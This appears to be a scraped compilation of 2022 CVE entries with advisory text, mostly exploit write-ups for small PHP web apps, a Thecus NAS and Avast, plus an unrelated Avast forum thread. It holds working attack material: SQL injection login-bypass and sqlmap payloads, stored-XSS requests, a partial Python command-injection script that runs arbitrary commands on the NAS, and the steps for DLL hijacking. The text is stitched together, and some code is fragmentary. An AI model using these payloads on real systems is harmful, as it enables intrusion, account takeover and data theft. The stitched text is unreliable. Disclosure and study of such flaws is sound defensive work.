Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

CVE-2022-26633: Offensive Security’s Exploit Database Archive

School Dormitory Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /dms/admin/reports/daily_collection_report.php.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

CVE-2022-30886: School Dormitory Management System 1.0 SQL Injection ≈ Packet Storm

ChatBot Application with a Suggestion Feature 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /simple_chat_bot/admin/responses/view_response.php.

CVE-2022-30518

Online Sports Complex Booking System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /scbs/view_facility.php.

CVE-2022-28105

Thecus 4800Eco was discovered to contain a command injection vulnerability via the username parameter in /adm/setmain.php.

\# To fix SSL error that occurs when script is started.

\# 1- Open /etc/ssl/openssl.cnf file

\# At the bottom of the file:

\# 2- Set value of MinProtocol as TLSv1.0

def readResult(s, target):

"params": '\[{"start":0,"limit":1,"catagory":"sys","level":"all"}\]'

url \= "https://" + target + "/adm/setmain.php"

resultReq \= s.post(url, data\=d, verify\=False)

dict \= resultReq.text.split()

print("\[+\] Reading system log...\\n")

#Set your command output range

def delUser(s, target, command):

"username": "$("+command+")"

url \= "https://" + target + "/adm/setmain.php?fun=setlocaluser"

delUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Local User remove succeeds' in delUserReq.text:

print('\[+\] %s command was executed successfully' % command)

print('\[-\] %s command was not executed!' %command)

def addUser(s, target, command):

d \= {'batch\_content': '%24('+command+')%2C22222%2C9999'}

url \= "https://" + target + "/adm/setmain.php?fun=setbatch"

addUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Users and groups were created successfully.' in addUserReq.text:

print('\[+\] Users and groups were created successfully')

print('\[-\] Users and groups were not created')

delUser(s, target, command)

def login(target, username, password, command\=None):

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

"option": "com\_extplorer"

url \= "https://" + target + "/adm/login.php"

loginReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if '"success":true' in loginReq.text:

print('\[+\] Authentication successful')

elif '"success":false' in loginReq.text:

print('\[-\] Authentication failed!')

print('\[-\] Something went wrong!')

addUser(s, target, command)

print("usage: %s targetIp:port username password command" % (args\[0\]))

print("Example 192.168.1.13:80 admin admin id")

login(target\=args\[1\], username\=args\[2\], password\=args\[3\], command\=args\[4\])

if \_\_name\_\_ \== "\_\_main\_\_":

CVE-2021-34111: Thecus N4800Eco Nas Server Control Panel Comand Injection

An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

CVE-2022-28964: NEW Avast Version 22.1 (January 2022)

A stored cross-site scripting (XSS) vulnerability in the addNewPost component of OrangeHRM v4.10.1 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**Environment details**  
OrangeHRM version: 4.10.1  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
Insufficient input validation in Buzz - addNewPost API results in Stored Cross Site Scripting attack. An attacker - who is an authenticated user - can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page.

**To Reproduce**

1.  Authenticate to the user dashboard.
2.  Visit 'Buzz' page
3.  Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id createPost__csrf_token. Example :

    <input type="hidden" name="createPost[_csrf_token]" value="8d7f3ee80979a1360fb445a6ffa1ffec" id="createPost__csrf_token">
    

4.  Collect the logged in user cookie _orangehrm
5.  Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too :

    POST /symfony/web/index.php/buzz/addNewPost HTTP/1.1
    Host: 1.2.3.44
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 173
    Origin: http://54.165.4.147
    Connection: close
    Cookie: Loggedin=True; _orangehrm=qod7ejr1fqjtvtnm27i62ltcrb
    
    createPost%5Bcontent%5D=content&createPost%5BlinkAddress%5D=javascript:alert(1221)&createPost%5BlinkTitle%5D=xss&createPost%5BlinkText%5D=&createPost%5B_csrf_token%5D=cb38d12166e154ded1869000c43c1ea5
    

6.  Click on the link 'xss' in the most recent post.

**Expected behavior**  
The value of parameters createPost[linkTitle] and createPost[linkAddress] should be validated by API and an error should be thrown.

**What do you see instead:**  
The malicious payload gets submitted successfully and get's stored in the posting made by the user.

**Screenshots**

  

**Technical Details**  
A logged in user can post status updates to their buzz feed. From the front-end application a user will be able to post a text within a single field which says "What's on your mind" to the buzz feed. This happens via a POST request to the URL /symfony/web/index.php/buzz/addNewPost through the createPost[content] request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application.

The following request body parameters found in the API results certain profound effects in the HTML response sent by server:

1.  createPost[linkAddress]
    
    Causes the addition of an <a> anchor tag in response with id linkTitle & with attribute src with the value set for createPost[linkAddress] parameter.
    
2.  createPost[linkTitle]
    
    Causes an <a> anchor tag in response with id linkTitle which is click able and displayed with the text content sent in the above request parameter.
    

Combining the above 2 parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable.

The URL payload could be javascript as javascript:alert(121). This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link.  
The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged-in user in orangeHRM. Every user will have this delivered through their 'Buzz' feed.

In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.

CVE-2022-28985: Stored XSS in "Update Status" section under "OrangeBuzz" via the GET/POST parameters `createPost[linkTitle]` and `createPost[linkAddress]` · Issue #1217 · orangehrm/orangehrm

Multiple DLL hijacking vulnerabilities via the components instup.exe and wsc_proxy.exe in Avast Premium Security before v21.11.2500 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via a crafted DLL file.

**CVE-2022-AVAST2 (Self-Defense Bypass via Repairing Function)****Product**

Avast - Premium Security

**Version**

21.11.2500 (build 21.11.6809.528)

**Vulnerable Component**

"instup.exe" and "wsc\_proxy.exe"

**Description**

It was noted that there is security checking to prevent some of the Avast processes from loading of undesired/unsigned DLLs via DLL hijacking attack.

However, It was noted that there are two Avast processes "instup.exe" and "wsc\_proxy.exe" which are vulnerable to DLL hijacking vulnerability. These processes will attempt to load an non-existing DLL (i.e., wbemcomn.dll) from "C:\\Windows\\System32\\wbem" when "REPAIR APP" function is triggered. Due to the lack of security checking within these two processes, attackers who have administrative privilege could drop a malicious version of "wbemcomn.dll" and get it loaded by the affected Avast processes.

Since those vulnerable components are Avast protected processes, attacker could inject malicious code to control the Avast protected processes for malicious purposes such as deactivating the antivirus and staging malware.

**Impact**

The vulnerability allows an attacker with administrative privilege to execute malicious code within Avast process, terminate the Avast antivirus regardless of "Self-Defense" protection and cause DOS to the affected system.

**Steps to reproduce**

1.  Install Avast Premium Security (version 21.11.2500)
2.  Open a Administrative CMD prompt and copy the malicious version of "wbemcomm.dll" to "C:\\Windows\\System32\\wbem"
3.  Open Avast Premium Security GUI -> Menu -> Settings -> Troubleshooting -> Click on "REPAIR APP"
4.  Wait for a while and the malicious "wbemcomm.dll" will be loaded by "instup.exe" and "wsc\_proxy.exe" (see poc.png)

**Resolution**

This vulnerability is patched since Avast Premium Security 22.2.

**Disclosure Timeline**

20-01-2022 Vulnerability reported to Avast.

11-02-2022 Avast confirmed the vulnerability and released a patch for the product.

**References**

https://forum.avast.com/index.php?topic=318305.0

CVE-2022-28965: Vulnerability-Disclosure/CVE-2022-AVAST2 at main · netero1010/Vulnerability-Disclosure

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

Tag

#php